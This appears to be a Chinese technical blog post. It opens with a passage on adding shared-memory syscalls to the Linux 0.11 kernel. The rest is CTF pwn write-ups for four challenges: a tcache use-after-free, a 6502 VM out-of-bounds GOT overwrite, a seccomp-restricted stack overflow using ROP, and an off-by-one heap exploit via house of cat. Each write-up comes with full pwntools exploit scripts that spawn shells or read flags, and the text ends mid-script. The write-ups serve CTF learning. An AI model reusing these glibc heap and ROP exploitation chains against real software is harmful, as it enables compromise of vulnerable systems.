if (!(tmp=get_free_page()))
return 0;
*page_table = tmp|7;
page_table = (unsigned long *) tmp;
}
page_table[(address>>12) & 0x3ff] = page | 7;
/* no need for invalidate */
return page;
}

本实验要求我们实现共享内存,首先我们需要添加共享内存的系统调用号:(在 /include/unistd.h 中)

1
2
#define __NR_shmget		76
#define __NR_shmat 77
  • 需要注意的是:这里同时需要修改 hdc-0.11.img 中的 hdc/usr/include/unistd.h 文件,如果想在虚拟机中使用 gcc 编译的话,会导入虚拟机 hdc/usr/include/ 中的文件为头文件

接着修改系统调用号的总数:(在 /kernel/system_call.s 中)

1
nr_system_calls = 78

最后添加新的系统调用定义:(在 /include/linux/sys.h 中)

1
2
3
4
extern int sys_shmget();
extern void *sys_shmat();

fn_ptr sys_call_table[] = {......, sys_shmget, sys_shmat};

头文件以及宏定义:(在 /kernel 中新建文件 shm.c

1
2
3
4
5
6
7
8
#include <asm/segment.h>
#include <linux/kernel.h>
#include <unistd.h>
#include <string.h>
#include <linux/sched.h>

#define SHM_COUNT 20
#define SHM_NAME_SIZE 20

核心结构体 struct_shm_tables

1
2
3
4
5
struct struct_shm_tables
{
char name[SHM_NAME_SIZE];
long addr;
} shm_tables[SHM_COUNT];

基础字符串函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int strcmp_shm(char* name,char* tmp){
int i;
for(i = 0; i<20; i++){
if(name[i] != tmp[i])
return 0;
if(tmp[i] =='\0' && name[i] == '\0') break;
}
return 1;
}

int strcpy_shm(char* name,char* tmp){
int i;
for(i = 0; i<20; i++){
name[i] = tmp[i];
if(tmp[i] =='\0') break;
}
return i;
}

int find_shm_location(char *name)
{
int i;
for (i = 0; i < SHM_COUNT; i++){
if (!strcmp_shm(name, shm_tables[i].name)){
return i;
}
}
return -1;
}

系统调用 sys_shmget:获取一片共享内存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int sys_shmget(char *name)
{
int i, shmid;
char tmp[SHM_NAME_SIZE];
for (i = 0; i < SHM_NAME_SIZE; i++){
tmp[i] = get_fs_byte(name + i);
if (tmp[i] == '\0')
break;
}
shmid = find_shm_location(tmp);
if (shmid != -1){
return shmid;
}
for (i = 0; i < SHM_COUNT; i++){
if (shm_tables[i].name[0] == "\0"){
strcpy_shm(shm_tables[i].name, tmp);
shm_tables[i].addr = get_free_page(); /* 获取一个空闲的页帧 */
return i;
}
}
printk("SHM Number limited!\n");
return -1;
}

系统调用 sys_shmat:映射一片共享内存

1
2
3
4
5
6
7
8
9
void *sys_shmat(int shmid)
{
if (shm_tables[shmid].name[0] == "\0"){
printk("SHM not exists!\n");
return -1;
}
put_page(shm_tables[shmid].addr, current->brk + current->start_code); /* 创建页表,建立起虚拟地址到物理地址的映射关系 */
return (void *)current->brk;
}

最后修改 makefile:

1
2
3
4
5
6
OBJS  = sched.o system_call.o traps.o asm.o fork.o \
panic.o printk.o vsprintf.o sys.o exit.o \
signal.o mktime.o sem.o shm.o

sem.s sem.o: sem.c ../include/linux/kernel.h ../include/unistd.h
shm.s shm.o: shm.c ../include/linux/kernel.h ../include/unistd.h

接下来我们需要修改上一个实验的生产者-消费者程序,并用共享内存做缓冲区:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#define   __LIBRARY__
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

_syscall2(int,sem_open,const char *,name,unsigned int,value);
_syscall1(int,sem_wait,int,sem);
_syscall1(int,sem_post,int,sem);
_syscall1(int,sem_unlink,const char *,name);

_syscall1(int,shmget,char*,name);
_syscall1(int,shmat,int,shmid);

const int consumerNum = 3;
const int itemNum = 6;
const int bufSize = 10;
int buf_in = 0,buf_out = 0;

int main()
{
int sem_empty, sem_full, sem_mutex;
int *buffer;
int shmid;
int stat;
pid_t p;
int i,j,k,fd;

if((sem_empty = sem_open("empty",1)) < 0){
perror("empty error!\n");
return -1;
}

if((sem_full = sem_open("full",0)) < 0){
perror("full error!\n");
return -1;
}

if((sem_mutex = sem_open("mutex",10)) < 0){
perror("mutex error!\n");
return -1;
}

shmid = shmget("buffer");

if(!(p = fork())){
printf("A(%d) create\n",0);
buffer = (int *)shmat(shmid);
for(i = 0; i < itemNum; i++){
sem_wait(sem_empty);
sem_wait(sem_mutex);

printf("A(%d) >> buf_in:%d\n",0,buf_in);
buffer[0] = buf_in;
buf_in = (buf_in+1) % bufSize;

sem_post(sem_mutex);
sem_post(sem_full);
}
printf("A(%d) done\n",0);
return 0;
}
else if(p < 0){
perror("fork error!\n");
return -1;
}

for(j = 0; j < consumerNum; j++){
if(!(p = fork())){
printf("B(%d) create\n",j);
buffer = (int *)shmat(shmid);
for(k = 0; k < itemNum/consumerNum; k++){
sem_wait(sem_full);
sem_wait(sem_mutex);

buf_out = buffer[0];
printf("B(%d) >> buf_out:%d\n",j,buf_out);

buf_out = (buf_out + 1) % bufSize;
buffer[0] = buf_out;

sem_post(sem_mutex);
sem_post(sem_empty);

}
printf("B(%d) done\n",j);
return 0;
}
else if(p < 0){
perror("fork error!\n");
return -1;
}
}

while ((wait(&stat)) > 0);
sem_unlink("empty");
sem_unlink("full");
sem_unlink("mutex");

puts("all done");
return 0;
}

这里有一个点需要注意,由于共享页面同时存在于两个进程中,因此会在 do_exit 中被释放两次

为了不触发内核报错,这里需要修改 free_page 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void free_page(unsigned long addr)
{
if (addr < LOW_MEM) return;
if (addr >= HIGH_MEMORY)
panic("trying to free nonexistent page");
addr -= LOW_MEM;
addr >>= 12;

mem_map[addr] = mem_map[addr] & ~(1) ;

/*
if (mem_map[addr]--) return;
mem_map[addr]=0;
panic("trying to free free page");
*/
}

最终的效果如下:

atuo_coffee_sale_machine

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.9) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b65a1033a56d36412b5e4993b0c7f4f4f2e685bf, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Partial RELRO,Canary,NX

漏洞分析

题目维护了两个数组 copy_left_coffeeleft_coffee,分别存放 user 和 root 状态下的数据

大多数函数在执行之前都会先根据当前状态进行切换,但 change_default 没有:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
show_list();
puts("input the id you want to change");
printf(">>>");
read(0, buf, 4uLL);
id = atol(buf) - 1;
if ( id < 3 )
{
puts("input which coffee you want to change");
printf(">>>");
read(0, buf, 4uLL);
index = atol(buf) - 1;
if ( index < 5 || copy_left_coffee[id][index] )
{
puts("input your content");
read(0, copy_left_coffee[id][index], 0x80uLL);
puts("done");
update(2);
}
else
{
puts("invalid coffee");
}
}

这意味着在 user 状态下释放 chunk 时,数据不会同步到 root 状态,这就造成了 UAF

入侵思路

程序中只有一个地方可以用来泄露:

1
2
3
4
5
6
7
for ( i = 0; i <= 2; ++i )
{
if ( coffee_list[i].num )
printf("%d.%s:%d\n", (unsigned int)(i + 1), coffee_list[i].name, (unsigned int)coffee_list[i].num);
else
printf("%d.%s:SOLD OUT!\n", (unsigned int)(i + 1), coffee_list[i].name);
}

劫持 tcachebin 为 coffee_list 就可以泄露 libc_base

最后劫持 tcachebin 为 free_hook,写入 system 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b *0x401CE9\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

def cmd(op):
sla(">>>",str(op))

def admin():
cmd(0x1145)
sla("password","just pwn it")

def edit(id,index,data):
cmd(2)
sla("change",str(id))
sla("change",str(index))
sa("content",data)

def add(id):
cmd(1)
sla(">>>",str(id))

def buy(id,data=""):
cmd(1)
sla("want to buy",str(id))
if(data == ""):
sla("Y/N","N")
else:
sla("Y/N","Y")
sa("coffee",data)

#debug()
coffee_list_addr = 0x4062f0

for i in range(5):
buy(1)

admin()
add(0)
cmd(3)

for i in range(2):
buy(1)

admin()
edit(1,7,p64(coffee_list_addr))
add(1)
add(1)
add(1)
cmd(3)

for i in range(3):
buy(2)
buy(1)
admin()
edit(1,2,p16(0x7680))
cmd(3)
cmd(2)
ru("================")
ru("1.")

leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
libc_base = leak_addr - 0x1ebbe0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

admin()
edit(2,3,p64(free_hook))
add(1)
add(1)
edit(1,5,p64(system))
cmd(3)

buy(1,"/bin/sh\x00")

p.interactive()

6502_proccessor

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.
1
2
3
4
5
6
6502_proccessor: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6c78b755035efbfcec3230038685158aefa0d8cb, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,Partial RELRO,Canary,NX,PIE

程序分析

本题目实现了一个 6502 CPU 指令集的 VM

6502 CPU 有3个8位寄存器:regA(累加器),regX(X变址寄存器),regY(Y变址寄存器)

题目中所有指令都由全局数组 lookup 进行管理,该数组的每个条目都被用于表示一个指令,其结构如下:

1
2
3
4
5
6
00000000 Node struc ; (sizeof=0x20, mappedto_18)
00000000 name dq ?
00000008 code2 dq ? ; offset
00000010 code1 dq ? ; offset
00000018 flag dq ?
00000020 Node ends

每个指令结构体中都有两个函数,一个表示该指令的操作,另一个表示该指令的寻址方式

要利用的指令操作如下:

1
2
3
4
5
6
7
8
__int64 LDA() /* 读取(从内存读到寄存器) */
{
fetch();
regA = fetched;
set_flag(1u, fetched == 0);
set_flag(7u, (unsigned __int8)regA >> 7);
return 1LL;
}
1
2
3
4
5
__int64 STA() /* 写入(从寄存器写入到内存) */
{
cpu_write(addr_abs, regA);
return 0LL;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
__int64 ADC() /* 直接控制regA */
{
__int16 v0; // bx
unsigned __int16 v2; // [rsp+Eh] [rbp-12h]

fetch();
v0 = (unsigned __int8)regA + (unsigned __int8)fetched;
v2 = v0 + (unsigned __int8)cpu_extract_sr(0);
set_flag(0, v2 > 0xFFu);
set_flag(1u, (unsigned __int8)v2 == 0);
set_flag(6u, ((unsigned __int8)~(regA ^ fetched) & (unsigned __int8)(regA ^ v2) & 0x80) != 0);
set_flag(7u, (v2 & 0x80) != 0);
regA = v2;
return 1LL;
}

要利用的寻址操作如下:

1
2
3
4
5
6
7
8
9
10
__int64 IZX() /* 基于regX的间接寻址 */
{
char v1; // [rsp+Ah] [rbp-6h]
__int16 v2; // [rsp+Ch] [rbp-4h]

v1 = cpu_fetch(cpu);
v2 = (unsigned __int8)cpu_fetch((unsigned __int8)(regX + v1));
addr_abs = ((unsigned __int8)cpu_fetch((unsigned __int8)(regX + v1 + 1)) << 8) | v2;
return 0LL;
}

漏洞分析

函数 write_mem 有负数溢出漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
__int64 __fastcall write_mem(unsigned __int16 a1, char a2)
{
if ( a1 > 0xFFu )
{
if ( a1 > 0x1FFu )
{
if ( a1 <= 0xFFF9u )
mem_ptr[(__int16)(a1 - 512) + 518] = a2;
else
mem_ptr[a1 - 0xFBFA] = a2;
}
else
{
mem_ptr[a1] = a2;
}
}
else
{
mem_ptr[a1] = a2;
}
return 0LL;
}
  • 注意 (__int16)(a1 - 512) 这段伪代码,这里有一个强制类型转换

虽然 IDA 分析 a1 是 unsigned __int16,但从汇编指令来看可以分析出问题:

1
2
3
4
5
6
7
.text:00000000000059E4 48 8B 15 0D 67 20 00          mov     rdx, cs:mem_ptr
.text:00000000000059EB 0F B7 45 FC movzx eax, [rbp+var_4]
.text:00000000000059EF 66 2D 00 02 sub ax, 200h
.text:00000000000059F3 98 cwde
.text:00000000000059F4 48 98 cdqe
.text:00000000000059F6 0F B6 4D F8 movzx ecx, [rbp+var_8]
.text:00000000000059FA 88 8C 02 06 02 00 00 mov [rdx+rax+206h], cl
  • 实现强制类型转换的汇编代码为:cwde cdqe(符号扩展)
  • 因此 a1 应该是16位的有符号数

同样的漏洞也出现在 get_mem 中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
unsigned __int8 __fastcall get_mem(unsigned __int16 cpu)
{
if ( DEBUG )
fprintf(stderr, "(get_mem) reading at: 0x%X\n", cpu);
if ( cpu <= 0xFFu )
return mem_ptr[cpu];
if ( cpu <= 0x1FFu )
return mem_ptr[cpu];
if ( cpu > 0xFFF9u )
return mem_ptr[cpu - 0xFBFA];
if ( DEBUG )
fprintf(stderr, "(get_mem) parsed: 0x%X\n", (unsigned int)cpu - 512);
return mem_ptr[(__int16)(cpu - 0x200) + 0x206];
}

入侵思路

本题目的核心点就是利用程序实现的 6502 CPU 指令来覆盖 puts_got 为 system

可以先使用 LDX 和 STX 往 regX 中写入 puts_got 的偏移,然后用 LDA 进行读取,计算步骤如下:

1
2
pwndbg> distance $rebase(0x20A018) 0x559fe1e0c120
0x559fe1e0a018->0x559fe1e0c120 is 0x2108 bytes (0x421 words)
1
2
In [5]: hex(0x10000-0x2108-0x206+0x200)
Out[5]: '0xdef2'

测试样例如下:

1
2
3
4
5
6
7
payload = b''
payload += LDX(0xf2)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0) # LDX(置空regX)
payload += LDA(0) # LDA(读取puts@got)
1
0x559fe1c05958    movzx  eax, byte ptr [rdx + rax + 0x206] <puts@got.plt>

读取 &puts 的值之后,我们可以使用 ADC 指令将 &puts 加为 &system:

1
2
pwndbg> distance &puts &system
0x7f1686641970->0x7f1686610420 is -0x31550 bytes (-0x62aa words)

最后用同样的方法往 regX 中写入 puts_got 的偏移,接着就可以使用 STA 覆盖 puts_got

每次覆盖1字节,连续执行3次后就可以将 puts 修改为 system

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './6502_proccessor1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x6919)\n")
pause()

def cmd(op):
sla(">",str(op))

def LDX(data):
payload = p8(0xa2) + p8(data)
return payload

def STX(offset):
payload = p8(0x86) + p8(offset)
return payload

def LDA(offset):
payload = p8(0xa1) + p8(offset)
return payload

def STA(offset):
payload = p8(0x81) + p8(offset)
return payload

def ABC(data):
payload = p8(0x65) + p8(data)
return payload

"""
In [5]: hex(0x10000-0x2108-0x206+0x200)
Out[5]: '0xdef2'
"""

#debug()
payload = b''
payload += LDX(0xf2)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0)
payload += LDA(0)

payload += LDX(0xb0)
payload += STX(0)
payload += ABC(0)

payload += LDX(0xf2)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0)
payload += STA(0)

payload += LDX(0xf3)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0)
payload += LDA(0)

payload += LDX(0xea)
payload += STX(0)
payload += ABC(0)

payload += LDX(0xf3)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0)
payload += STA(0)

payload += LDX(0xf4)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0)
payload += LDA(0)

payload += LDX(0xfc)
payload += STX(0)
payload += ABC(0)

payload += LDX(0xf4)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0)
payload += STA(0)

sla("length:",str(len(payload)))
sa("code",payload)
sl("/bin/sh")

p.interactive()

silent

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.5) stable release version 2.27.
1
2
3
4
5
6
silent: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=178287750053d8eedf914be6f97e8ab65e812b1b, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Full RELRO,NX
1
2
3
4
5
6
7
8
9
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x06 0xc000003e if (A != ARCH_X86_64) goto 0008
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x03 0xffffffff if (A != 0xffffffff) goto 0008
0005: 0x15 0x02 0x00 0x0000003b if (A == execve) goto 0008
0006: 0x15 0x01 0x00 0x00000142 if (A == execveat) goto 0008
0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0008: 0x06 0x00 0x00 0x00000000 return KILL

漏洞分析

栈溢出:

1
2
3
4
5
6
7
8
9
10
11
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[64]; // [rsp+10h] [rbp-40h] BYREF

init_seccomp();
alarm(0x1Eu);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
read(0, buf, 0x100uLL);
return 0;
}

入侵思路

首先我们需要一个 magic gadget:

1
2
3
4
5
6
➜  pwn2 ROPgadget --binary silent --depth 600 | grep "rbp - 0x3d"
0x0000000000400787 : add byte ptr [rbp - 0x3d], bl ; nop word ptr [rax + rax] ; mov esi, 0x601010 ; push rbp ; sub rsi, 0x601010 ; mov rbp, rsp ; sar rsi, 3 ; mov rax, rsi ; shr rax, 0x3f ; add rsi, rax ; sar rsi, 1 ; je 0x4007c8 ; mov eax, 0 ; test rax, rax ; je 0x4007c8 ; pop rbp ; mov edi, 0x601010 ; jmp rax
0x00000000004007e8 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
0x00000000004007e3 : add eax, 0x20084f ; add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
0x00000000004007e6 : and byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
0x00000000004007e1 : inc esi ; add eax, 0x20084f ; add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret

下面这段 gadget 是通过指令错位得来的:

1
0x00000000004007e8 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
  • [rbp - 0x3d] 中的数据加上 ebx
  • 由于我们可以控制 rbp,因此这段 gadget 实现了 WAA

核心思路就是覆盖 stdout 上遗留的 libc_addr 为 puts,完成泄露以后再覆盖回来写循环

下一次执行 main 就可以写入 ORW 链了

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './silent1'

context.os='linux'
context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b *0x4008FD\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

def cmd(op):
sla(">",str(op))

csu_front_addr=0x400940
csu_end_addr=0x40095A

def csu(rbx, rbp, r12, r13, r14, r15, last):
# pop rbx,rbp,r12,r13,r14,r15
# rbx should be 0,
# rbp should be 1,enable not to jump
# r12 should be the function we want to call(只能是got表地址)
# rdx=r15d
# rsi=r14
# rdi=r13
# csu(0, 1, fun_got, rdi, rsi, rdx, last)
payload = b""
payload += p64(csu_end_addr)
payload += p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
payload += p64(csu_front_addr)
payload += b'a' * 0x38
payload += p64(last)
return payload

magic_addr = 0x00000000004007e8
pop_rbp = 0x0000000000400788
libc_start_main_addr = 0x600FF0
stdout = 0x601020
main_addr = 0x400879
start_addr = 0x400720
bss_addr = 0x601020 + 0x200
level_ret = 0x4008FC
level_ret = 0x4008FC

payload = b"a"*0x40+b"b"*0x8
payload += p64(csu_end_addr)+p64(0xffffffffffc94210)+p64(stdout+0x3d)+p64(0x1b5ef80+stdout)+p64(libc_start_main_addr)+p64(0)+p64(0)
payload += p64(magic_addr)
payload += p64(pop_rbp) + p64(0xffffffffffc94210+1)
payload += p64(csu_front_addr)
payload += b'a' * 0x8
payload += p64(0x36bdf0)
payload += p64(stdout+0x3d)
payload += p64(0)*4
payload += p64(magic_addr)
payload += p64(start_addr)

success("payload len >> "+hex(len(payload)))
sl(payload)

leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x21ba0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

pop_rdi_ret = libc_base + 0x000000000002164f
pop_rsi_ret = libc_base + 0x0000000000023a6a
pop_rdx_ret = libc_base + 0x0000000000001b96

open_libc = libc_base + libc.sym["open"]
read_libc = libc_base + libc.sym["read"]
write_libc = libc_base + libc.sym["write"]

payload = b"a"*0x40+b"b"*0x8
# read(0, bss_addr, 0x30)
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_ret) + p64(bss_addr)
payload += p64(pop_rdx_ret) + p64(0x30)
payload += p64(read_libc)
# open(bss_addr,0)
payload += p64(pop_rdi_ret) + p64(bss_addr)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(open_libc)
# read(3,bss_addr,0x60)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rdx_ret) + p64(0x50)
payload += p64(read_libc)
# write(1,bss_addr,0x60)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(write_libc)
success("payload len >> "+hex(len(payload)))

#debug()
sleep(1)
sl(payload)

sleep(1)
p.send("./flag")

p.interactive()

babyheap

1
GNU C Library (Ubuntu GLIBC 2.38-1ubuntu6) stable release version 2.38.
1
2
3
4
5
6
babyheap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6b74874314aed94f7f0bb37f33a1aace975e2491, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

dele show edit 中的 chunk_listsize_list 有溢出:

1
2
3
4
5
6
7
8
9
if ( index < 0x11 )
{
if ( chunk_list[index] )
{
free(chunk_list[index]);
chunk_list[index] = 0LL;
size_list[index] = 0;
}
}

有 off-by-one 漏洞:

1
2
3
4
5
6
7
8
for ( i = 0; i < size; ++i )
{
read(0, &code, 1uLL);
if ( code == 0xA )
break;
buf[i] = code;
}
buf[i] = 0;

入侵思路

利用 off-by-one 可以打 unlink attack,进而泄露 heap_base 和 libc_base:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
ru("easier\n")
leak_addr = eval(ru("\n"))
heap_base = leak_addr - 0x2a0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

fake_heap_addr = heap_base + 0x2c0
payload = p64(0)+ p64(0xc61)
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

add(0x428,payload) #0
add(0x428,"a"*0x10) #1
add(0x408,"a"*0x10) #2
add(0x4f8,"a"*0x10) #3
add(0x408,"a"*0x10) #4
add(0x408,"a"*0x10) #5
add(0x408,"a"*0x10) #6

edit(2,0x408,b"b"*0x400+p64(0xc60))

dele(3)
add(0x418,"c"*8)
add(0x428,"c"*8)
add(0x408,"c"*8)
dele(1)
add(0x500,"c"*8)

show(7)
ru("\n")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x1ff0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

接下来就可以劫持 tcache,进而劫持 IO_list_all

最后打 house of cat 就可以了(这里需要整理一下堆风水,以便 /bin/sh 的写入)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
# -*- coding:utf-8 -*-
from pwn import *

